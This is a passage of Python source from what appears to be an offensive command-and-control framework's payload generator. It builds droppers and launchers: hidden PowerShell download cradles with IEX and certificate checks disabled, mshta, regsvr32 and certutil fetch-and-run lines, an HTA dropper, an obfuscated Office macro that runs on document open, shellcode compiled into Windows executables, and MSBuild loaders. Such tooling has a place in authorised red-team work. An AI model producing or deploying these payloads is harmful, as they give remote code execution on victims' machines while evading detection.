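a=new ActiveXObject("Shell.Application").ShellExecute("powershell.exe"," -exec bypass -Noninteractive -windowstyle hidden -e %s","","open","0");
</scRIPt></sCrIptlEt>
""" % basefile
    with open("%srg_sct.xml" % self.BaseDirectory, 'w') as output_file:
        output_file.write(raw1)
    with open("%scs_sct.xml" % self.BaseDirectory, 'w') as output_file:
        output_file.write(raw2)
    self.QuickstartLog("" + Colours.END)
    self.QuickstartLog("Execution via Command Prompt" + Colours.GREEN)
    psuri = self.HostnameIP + ":" + self.Serverport + "/" + QuickCommand + "_bs"
    pscmd = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri
    psurienc = base64.b64encode(pscmd.encode('UTF-16LE'))
    self.QuickstartLog("powershell -exec bypass -Noninteractive -windowstyle hidden -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')\"" % psuri)
    self.QuickstartLog("")
    self.QuickstartLog("powershell -exec bypass -Noninteractive -windowstyle hidden -e %s" % psurienc)
    self.QuickstartLog("" + Colours.END)
    self.QuickstartLog("Execution via Powershell" + Colours.GREEN)
    self.QuickstartLog("[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri)
    self.QuickstartLog("" + Colours.END)
    self.QuickstartLog("Other Execution Methods" + Colours.GREEN)
    # _cs serves the JScript scriptlet (mshta), _rg the VBScript one (regsvr32).
    cs_uri = self.HostnameIP + ":" + self.Serverport + "/" + QuickCommand + "_cs"
    self.QuickstartLog("mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % cs_uri)
    self.QuickstartLog("")
    rg_uri = self.HostnameIP + ":" + self.Serverport + "/" + QuickCommand + "_rg"
    self.QuickstartLog("regsvr32 /s /n /u /i:%s scrobj.dll" % rg_uri)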
def CreateHTA(self):
basefile = self.CreateRawBase(full=True)
hta = """<script>
ao=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l");
ao.run('%s', 0);window.close();
</script>""" % basefile
self.QuickstartLog( "HTA Payload written to: %sLauncher.hta" % self.BaseDirectory )
filename = "%sLauncher.hta" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(hta)
output_file.close()
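def CreateCS(self):
    """Render ``Posh.cs`` from the ``FilesDirectory`` template.

    The template's ``#REPLACEME#`` slot receives the bare base64 launcher
    (no ``powershell -e`` prefix) from :meth:`CreateRawBase`; the result is
    written to ``<BaseDirectory>Posh.cs`` and the output is closed on every
    path via the context manager.
    """
    basefile = self.CreateRawBase()
    with open("%sPosh.cs" % FilesDirectory, 'rb') as f:
        template = f.read()
    cs = template.replace("#REPLACEME#", basefile)
    target = "%sPosh.cs" % self.BaseDirectory
    self.QuickstartLog("CS Payload written to: %s" % target)
    with open(target, 'w') as output_file:
        output_file.write(cs)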
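def CreatePython(self, name=""):
    """Write the OSX/Linux dropper one-liner and echo it to the quickstart log.

    ``self.Python`` (the stager rendered in ``__init__``) is base64-encoded and
    wrapped in ``echo "import sys,base64;exec(...)" | python &``.  Despite the
    ``.py`` extension the file holds that shell pipeline, not a Python script,
    so it is meant to be pasted into a shell rather than run with ``python``.

    Args:
        name: optional prefix for the ``py_dropper.py`` file name.
    """
    self.QuickstartLog("" + Colours.END)
    self.QuickstartLog("OSX Python Payload:" + Colours.GREEN)
    encoded = base64.b64encode(self.Python)
    pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % encoded
    target = "%s%spy_dropper.py" % (self.BaseDirectory, name)
    with open(target, 'w') as output_file:
        output_file.write(pydropper)
    self.QuickstartLog(pydropper)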
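def CreateEXE(self, name=""):
    """Embed the x64/x86 shellcode into the C templates and try to compile them.

    Reads ``<BaseDirectory><name>Posh-shellcode_{x64,x86}.bin`` (written by
    :meth:`CreateShellcode`), renders ``Shellcode.c`` and
    ``Shellcode_migrate.c`` from ``FilesDirectory`` with the bytes as a
    ``char sc[]`` literal, writes the ``.c`` files next to the shellcode and
    then invokes gcc (TDM-GCC on Windows, mingw-w64 cross compilers
    elsewhere).  A missing compiler or a build failure is printed, not
    raised, so the remaining payload types are still generated.

    Args:
        name: optional prefix shared with the shellcode/DLL file names.
    """
    def as_c_array(blob):
        # "\xNN"-escaped bytes, wrapped by formStr into a char sc[] literal.
        return formStr("char sc[]", "".join("\\x{:02x}".format(ord(c)) for c in blob))

    def render(template, c_array, out_name, label):
        # Fill the #REPLACEME# slot of one C template and write it out.
        with open("%s%s" % (FilesDirectory, template), 'rb') as f:
            content = f.read()
        self.QuickstartLog("%s EXE Payload written to: %s%s%s.exe" % (label, self.BaseDirectory, name, out_name))
        with open("%s%s%s.c" % (self.BaseDirectory, name, out_name), 'w') as output_file:
            output_file.write(content.replace("#REPLACEME#", c_array))

    def gcc(out_name, bits):
        # Argument list rather than a shell string: BaseDirectory/name are
        # passed through intact even if they contain spaces or shell
        # metacharacters, and no intermediate shell is spawned.
        if os.name == 'nt':
            compiler = "C:\\TDM-GCC-%s\\bin\\gcc.exe" % bits
        elif bits == "64":
            compiler = "x86_64-w64-mingw32-gcc"
        else:
            compiler = "i686-w64-mingw32-gcc"
        src = "%s%s%s.c" % (self.BaseDirectory, name, out_name)
        exe = "%s%s%s.exe" % (self.BaseDirectory, name, out_name)
        subprocess.check_output([compiler, src, "-o", exe])

    with open("%s%sPosh-shellcode_x64.bin" % (self.BaseDirectory, name), 'rb') as f:
        sc64 = as_c_array(f.read())
    render("Shellcode.c", sc64, "Posh64", "64bit")
    render("Shellcode_migrate.c", sc64, "Posh64_migrate", "64bit")
    with open("%s%sPosh-shellcode_x86.bin" % (self.BaseDirectory, name), 'rb') as f:
        sc32 = as_c_array(f.read())
    render("Shellcode.c", sc32, "Posh32", "32bit")
    render("Shellcode_migrate.c", sc32, "Posh32_migrate", "32bit")
    try:
        uri = self.HostnameIP + ":" + self.Serverport + "/" + QuickCommand + "_ex6"
        self.QuickstartLog("" + Colours.END)
        self.QuickstartLog("Download Posh64.exe using certutil:" + Colours.GREEN)
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, randomuri()))
        gcc("Posh64", "64")
        gcc("Posh32", "32")
        # NOTE(review): the Posh32 hint below reuses the _ex6 URI of the
        # 64-bit build, as the original did; confirm against the server
        # routes whether a separate 32-bit quick-command route exists.
        self.QuickstartLog("" + Colours.END)
        self.QuickstartLog("Download Posh32.exe using certutil:" + Colours.GREEN)
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, randomuri()))
        gcc("Posh64_migrate", "64")
        gcc("Posh32_migrate", "32")
    except Exception as e:
        print(e)
        print("apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common")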
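def CreateMacro(self, name=""):
    """Write an Office VBA macro that launches ``powershell -e`` with the core.

    Every common auto-run entry point (``Auto_Open``, ``AutoOpen``,
    ``Workbook_Open``, ``Document_Open`` and their variants) calls
    ``UpdateMacro``, which rebuilds ``powershell.exe`` one character at a
    time and shells it with the base64 launcher from :meth:`CreateRawBase`
    (split into ``str`` by ``formStrMacro``).

    The output path is ``<BaseDirectory><name>macro.txt``: the original
    logged that path but wrote to ``macro.txt`` regardless of ``name``, so the
    log and the file disagreed whenever a prefix was given.  With the default
    ``name=""`` the path is unchanged.

    Args:
        name: optional prefix for the output file name.
    """
    basefile = self.CreateRawBase()
    strmacro = formStrMacro("str", basefile)
    macro = """Sub Auto_Open()
UpdateMacro
End Sub
Sub AutoOpen()
UpdateMacro
End Sub
Sub Workbook_Open()
UpdateMacro
End Sub
Sub WorkbookOpen()
UpdateMacro
End Sub
Sub Document_Open()
UpdateMacro
End Sub
Sub DocumentOpen()
UpdateMacro
End Sub
Sub UpdateMacro()
Dim str, exec
%s
exec = "p"
exec = exec + "o"
exec = exec + "w"
exec = exec + "e"
exec = exec + "r"
exec = exec + "s"
exec = exec + "h"
exec = exec + "e"
exec = exec + "l"
exec = exec + "l"
exec = exec + "."
exec = exec + "e"
exec = exec + "x"
exec = exec + "e"
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str
Shell(exec)
End Sub
""" % strmacro
    target = "%s%smacro.txt" % (self.BaseDirectory, name)
    self.QuickstartLog("Macro Payload written to: %s" % target)
    with open(target, 'w') as output_file:
        output_file.write(macro)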
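def CreateMsbuild(self, name=""):
    """Render ``csc.cs`` and ``msbuild.xml`` carrying both shellcode blobs.

    Reads ``<BaseDirectory><name>Posh-shellcode_{x86,x64}.bin`` (written by
    :meth:`CreateShellcode`), base64-encodes them and substitutes them into
    the ``#REPLACEME32#`` / ``#REPLACEME64#`` slots of the ``csc.cs`` and
    ``msbuild.xml`` templates in ``FilesDirectory``.  ``msbuild.xml`` also
    gets a value from ``randomuri()`` in its ``#REPLACEMERANDSTRING#`` slot.
    All files are closed on every path via context managers.

    Args:
        name: optional prefix shared with the shellcode file names.
    """
    x86filename = "%s%s" % (self.BaseDirectory, name + "Posh-shellcode_x86.bin")
    x64filename = "%s%s" % (self.BaseDirectory, name + "Posh-shellcode_x64.bin")
    with open(x86filename, "rb") as blob86:
        x86base64 = base64.b64encode(blob86.read())
    with open(x64filename, "rb") as blob64:
        x64base64 = base64.b64encode(blob64.read())
    with open("%scsc.cs" % FilesDirectory, 'rb') as f:
        ccode = f.read()
    ccode = ccode.replace("#REPLACEME32#", x86base64).replace("#REPLACEME64#", x64base64)
    filename = "%s%scsc.cs" % (self.BaseDirectory, name)
    with open(filename, 'w') as output_file:
        output_file.write(ccode)
    self.QuickstartLog("")
    self.QuickstartLog("CSC file written to: %s%scsc.cs" % (self.BaseDirectory, name))
    with open("%smsbuild.xml" % FilesDirectory, 'rb') as f:
        msbuild = f.read()
    projname = randomuri()
    msbuild = msbuild.replace("#REPLACEME32#", x86base64)
    msbuild = msbuild.replace("#REPLACEME64#", x64base64)
    msbuild = msbuild.replace("#REPLACEMERANDSTRING#", projname)
    self.QuickstartLog("Msbuild file written to: %s%smsbuild.xml" % (self.BaseDirectory, name))
    filename = "%s%smsbuild.xml" % (self.BaseDirectory, name)
    with open(filename, 'w') as output_file:
        output_file.write(msbuild)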